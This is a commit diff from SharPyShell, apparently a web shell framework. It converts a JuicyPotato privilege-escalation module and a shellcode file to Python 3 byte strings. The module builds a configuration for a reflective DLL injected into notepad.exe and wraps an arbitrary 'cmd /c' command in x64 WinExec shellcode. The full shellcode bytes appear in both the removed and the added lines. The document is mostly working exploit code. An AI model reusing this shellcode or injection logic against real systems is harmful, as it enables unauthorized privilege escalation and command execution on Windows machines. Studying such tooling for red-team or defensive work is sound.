STRLCPY/SharPyShell

fixed juicypotato srdi module string encodings for python3
antonioCoco committed 3 years ago

b234d3b0

1 parent 56f4289a

■ ■ ■ ■ ■ ■

modules/privesc_juicy_potato.py

		skipped 147 lines
148	148		return parsed_response
149	149
150	150		def __run_reflective_dll_version(self, cmd, custom_shellcode_path, logfile, clsid):
151		-	LogFile = logfile
152		-	remote_process = 'notepad.exe'
153		-	CLSID = clsid
154		-	ListeningPort = self.__random_listening_port
155		-	RpcServerHost = '127.0.0.1'
156		-	RpcServerPort = '135'
157		-	ListeningAddress = '127.0.0.1'
	151	+	LogFile = logfile.encode()
	152	+	remote_process = b'notepad.exe'
	153	+	CLSID = clsid.encode()
	154	+	ListeningPort = self.__random_listening_port.encode()
	155	+	RpcServerHost = b'127.0.0.1'
	156	+	RpcServerPort = b'135'
	157	+	ListeningAddress = b'127.0.0.1'
158	158		if custom_shellcode_path == 'default':
159		-	shellcode_bytes = shellcode.winexec_x64 + 'cmd /c "' + cmd + '"\00'
	159	+	shellcode_bytes = shellcode.winexec_x64 + b'cmd /c "' + cmd.encode() + b'"\00'
160	160		thread_timeout = '60000'
161	161		else:
162	162		thread_timeout = '0'
163	163		with open(custom_shellcode_path, 'rb') as file_handle:
164	164		shellcode_bytes = file_handle.read()
165		-	configuration = LogFile + '\00'
166		-	configuration += remote_process + '\00'
167		-	configuration += CLSID + '\00'
168		-	configuration += ListeningPort + '\00'
169		-	configuration += RpcServerHost + '\00'
170		-	configuration += RpcServerPort + '\00'
171		-	configuration += ListeningAddress + '\00'
172		-	configuration += str(len(shellcode_bytes)) + '\00'
	165	+	configuration = LogFile + b'\00'
	166	+	configuration += remote_process + b'\00'
	167	+	configuration += CLSID + b'\00'
	168	+	configuration += ListeningPort + b'\00'
	169	+	configuration += RpcServerHost + b'\00'
	170	+	configuration += RpcServerPort + b'\00'
	171	+	configuration += ListeningAddress + b'\00'
	172	+	configuration += str(len(shellcode_bytes)).encode() + b'\00'
173	173		configuration += shellcode_bytes
174		-	configuration_bytes_csharp = '{' + ",".join('0x{:02x}'.format(x) for x in configuration.encode()) + '}'
	174	+	configuration_bytes_csharp = '{' + ",".join('0x{:02x}'.format(x) for x in configuration) + '}'
175	175		response = self.inject_dll_reflective_module_object.run(['juicypotato_reflective.dll', 'remote_virtual',
176	176		'cmd.exe', thread_timeout, configuration_bytes_csharp])
177	177		parsed_response = self._parse_response(response)
		skipped 27 lines

■ ■ ■ ■ ■ ■

utils/shellcode.py

		skipped 8 lines
9	9		'Arch' => ARCH_X64,
10	10		'Payload' =>
11	11		'''
12		-	winexec_x64 = ""
13		-	winexec_x64 += "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
14		-	winexec_x64 += "\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
15		-	winexec_x64 += "\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
16		-	winexec_x64 += "\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
17		-	winexec_x64 += "\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
18		-	winexec_x64 += "\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
19		-	winexec_x64 += "\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
20		-	winexec_x64 += "\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
21		-	winexec_x64 += "\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
22		-	winexec_x64 += "\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
23		-	winexec_x64 += "\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
24		-	winexec_x64 += "\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
25		-	winexec_x64 += "\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
26		-	winexec_x64 += "\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
27		-	winexec_x64 += "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
28		-	winexec_x64 += "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
29		-	winexec_x64 += "\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"
30		-	winexec_x64 += "\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41"
31		-	winexec_x64 += "\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
32		-	winexec_x64 += "\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
33		-	winexec_x64 += "\x00\x59\x41\x89\xda\xff\xd5"
34		-
	12	+	winexec_x64 = b""
	13	+	winexec_x64 += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
	14	+	winexec_x64 += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
	15	+	winexec_x64 += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
	16	+	winexec_x64 += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
	17	+	winexec_x64 += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
	18	+	winexec_x64 += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
	19	+	winexec_x64 += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
	20	+	winexec_x64 += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
	21	+	winexec_x64 += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
	22	+	winexec_x64 += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
	23	+	winexec_x64 += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
	24	+	winexec_x64 += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
	25	+	winexec_x64 += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
	26	+	winexec_x64 += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
	27	+	winexec_x64 += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
	28	+	winexec_x64 += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
	29	+	winexec_x64 += b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"
	30	+	winexec_x64 += b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41"
	31	+	winexec_x64 += b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
	32	+	winexec_x64 += b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
	33	+	winexec_x64 += b"\x00\x59\x41\x89\xda\xff\xd5"

fixed juicypotato srdi module string encodings for python3